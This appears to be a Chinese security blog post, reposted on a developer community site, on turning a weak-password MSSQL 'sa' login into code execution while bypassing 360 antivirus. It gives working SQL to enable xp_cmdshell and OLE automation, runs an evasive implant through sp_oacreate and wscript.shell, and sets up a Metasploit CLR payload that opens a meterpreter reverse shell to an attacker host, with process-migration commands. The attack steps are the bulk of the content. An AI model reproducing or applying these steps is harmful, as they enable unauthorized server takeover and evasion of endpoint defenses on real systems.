备案控制台
探索云世界
开发者社区 数据库 文章 正文

MSSQL弱口令绕过某数字上线

2023-09-30 102
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: MSSQL弱口令绕过某数字上线

0x01 前言

朋友实战中遇到的场景:MSSQL弱口令,sa权限,安装有360全家桶,问如何绕过360上线?

根据他的叙述说明这个数据库是可以直连的,猜测应该是扫到的一台MSSQL弱口令的机器。这篇文章我将分享下他这种场景的一些绕过方式,只是给大家提供思路,算是抛砖引玉吧,大家自行发挥!

0x02 前期测试

内网扫到一台MSSQL弱口令,或者一个SQL注入,这时我们一般都会先判断是否为dba权限、xp_cmdshell组件是否可用?如果可用则直接执行命令提权。

    判断当前是否为dba权限,为1则可以提权
select is_srvrolemember('sysadmin');
查看是否存在xp_cmdshell
exec sp_configure 'xp_cmdshell', 1;reconfigure;
查看能否使用xp_cmdshell,从mssql2005版本之后默认关闭
select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'
开启xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 1;reconfigure;
关闭xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 0;reconfigure;
执行命令xp_cmdshell
exec master..xp_cmdshell 'cmd /c whoami'


    但如果目标主机有360时就一定会拦截,常见返回报错不是5就是拒绝访问。

    因为这个组件调用的是system32下的cmd.exe,360已经拦死了,这里没法绕过!之前文章中也有说过。

    sqlmap也一样,xp_cmdshell都是在sqlservr.exe进程下起一个cmd.exe子进程来执行命令和程序的,这也就是360拦截原因,检测了sqlservr.exe进程链。

    注:MSSQL堆叠注入执行多条SQL语句时必须加上;分号,否则无法正常执行,而客户端连接MSSQL数据库执行多条SQL语句时只需换行即可,不能用;分号,否则也可能无法正常执行。


    0x03 绕过方式

    (1) Godzilla

    利用哥斯拉“数据库Shell”功能连上这个数据库,然后将命令行模板中的cmd直接改为我们的免杀马。

    这时只需要在命令行下随便输入个字符回车执行即可成功上线,360全程无拦截。


    (2) sp_oacreate

    开启Ole automation procedures,并使用sp_oacreate存储过程调用wscript.shell组件执行命令,只需要将免杀马做为程序去执行即可成功上线,360全程无拦截。

      开启Ole automation procedures
exec sp_configure 'show advanced options', 1;reconfigure
exec sp_configure 'ole automation procedures',1;reconfigure
执行命令sp_oacreate
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',null,'C:\ProgramData\360.exe'


      (3) mssql_clr_payload

      我们还可以利用MSF下的mssql_clr_payload模块来进行上线,该模块在执行时会自动开启CLR存储过程并将数据库标记为可信任等相关操作,360全程无拦截。

        use exploit/windows/mssql/mssql_clr_payload
set rhosts 192.168.1.109
set username sa
set password 123456
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.120
set lport 443

        这里可以看到CLR这种利用方式也不是调用cmd.exe执行的,没有创建任何子进程,而是直接运行在sqlservr.exe进程下了,所以360不会对其拦截!!!


        0x04 文末总结

        Godzilla、sp_oacreate这两种方式都是将我们的免杀马做为程序执行,没有调用cmd.exe执行,所以360也不会拦截,但如果做为参数执行肯定还是会被拦的。


        修改哥斯拉命令执行模板、EfsPotato插件将我们的免杀马做为程序执行上线MSF时建议加个进程迁移,否则执行后哥斯拉可能会卡住,执行不了任何操作

          set AutoRunScript migrate -f
set AutoRunScript post/windows/manage/migrate NAME=notepad.exe


          注意:看到有师傅说这种方法也会被拦,不知道他是不是开了核晶模式?但我这里没有拦,不知道什么情况,大家在实战中自己多去测试下吧......!


          文章标签:
          数据库
          SQL
          .NET
          存储
          开发框架
          潇湘信安
          目录
          相关文章
          黑客网络安全
          |
          7月前
          |
          安全 数据安全/隐私保护
          渗透攻击实例-后台弱口令
          渗透攻击实例-后台弱口令
          黑客网络安全
          57 0
          sumith
          |
          3月前
          |
          安全 数据安全/隐私保护
          弱口令检测 -- WebCrack v(1.1)
          弱口令检测 -- WebCrack v(1.1)
          sumith
          21 0
          Meteor.792
          |
          10月前
          |
          存储 算法 安全
          网络安全实验一 Window本地破解用户口令
          网络安全实验一 Window本地破解用户口令
          Meteor.792
          146 0
          Vista_AX
          |
          11月前
          |
          安全 前端开发 JavaScript
          代码审计——硬编码口令/弱口令详解
          代码审计——硬编码口令/弱口令详解
          Vista_AX
          289 0
          德迅云安全陈琦琦
          |
          存储 算法 安全
          弱口令介绍
          弱口令介绍
          德迅云安全陈琦琦
          467 0
          游客az7yd3cqma4aw
          |
          安全 数据安全/隐私保护
          锁群管理系统v2.0存在弱口令漏洞
          锁群管理系统v2.0存在弱口令漏洞
          游客az7yd3cqma4aw
          126 0
          锁群管理系统v2.0存在弱口令漏洞
          Hacker2001
          |
          JavaScript 中间件 数据安全/隐私保护
          【每日渗透笔记】后台弱口令+未授权尝试
          【每日渗透笔记】后台弱口令+未授权尝试
          Hacker2001
          162 0
          【每日渗透笔记】后台弱口令+未授权尝试
          风移
          |
          SQL 安全 测试技术
          MSSQL - 最佳实践 - 如何打码隐私数据列
          --- title: MSSQL - 最佳实践 - 如何打码隐私数据列 author: 风移 --- # 摘要 在SQL Server安全系列专题月报分享中,我们已经分享了:如何使用对称密钥实现SQL Server列加密技术、使用非对称密钥加密方式实现SQL Server列加密、使用混合密钥实现SQL Server列加密技术、列加密技术带来的查询性能问题以及相应解决方案和行级别安全解决方
          风移
          1442 0
          技术小阿哥
          |
          数据安全/隐私保护
          PowerShell批量检查域密码弱口令
          技术小阿哥
          1341 0
          晚来风急
          |
          安全 测试技术 数据安全/隐私保护
          这种口令解决方案可替代多因子验证
          本文讲的是这种口令解决方案可替代多因子验证,普利茅斯大学一项研究表明:采用图像和一次性数字编码可以作为一种安全且易于使用的方案代替依赖于硬件或软件的多因子验证方式或者一次性密码。
          晚来风急
          1189 0

          热门文章

          最新文章

        • 1
          解决关于Windows Defender Antivirus Service自启造成运行python程序时,Windows的cpu和内存占用过高问题
        • 2
          订票系统不再瘫痪 阿里云确认与12306合作
        • 3
          2022年了!你有几种获取URL参数的方法?
        • 4
          基于Tablestore的一站式物联网存储解决方案-场景篇
        • 5
          使用 Notepad++ 编辑 .java 文件时的相关配置
        • 6
          烂泥:IIS主机头的理解与应用
        • 7
          安装SQLSERVER2000时出现以前的某个程序安装已在安装计算机上创建挂起的文件操作
        • 8
          android 官方文档中的一些错误收集
        • 9
          Git SSH Key 生成步骤
        • 10
          iReport中求和的问题
        • 1
          【C言专栏】C 语言结构体的应用与实践
          19
        • 2
          【C 言专栏】C 语言指针的深度解析
          20
        • 3
          【专栏:HTML与CSS前端技术趋势篇】HTML与CSS在PWA(Progressive Web Apps)中的应用
          19
        • 4
          【专栏:HTML与CSS前端技术趋势篇】前端框架(React/Vue/Angular)与HTML/CSS的结合使用
          18
        • 5
          Docker部署Traefik结合内网穿透远程访问Dashboard界面
          24
        • 6
          【专栏:HTML 与 CSS 前端技术趋势篇】Web 性能优化:CSS 与 HTML 的未来趋势
          13
        • 7
          探索自动化测试工具Selenium Grid的高效集成策略
          11
        • 8
          深入理解PHP中的命名空间
          14
        • 9
          【专栏:HTML与CSS前端技术趋势篇】渐进式增强与优雅降级在前端开发中的实践
          11
        • 10
          【专栏:HTML与CSS前端技术趋势篇】网页设计中的CSS Grid与Flexbox之争
          11

          • 相关电子书

          更多
        • 微信客户端怎样应对弱网络
        • 安全机制与User账户身份验证实战
        • 低代码开发师(初级)实战教程
          • 下一篇
          2024年阿里云免费云服务器及学生云服务器申请教程参考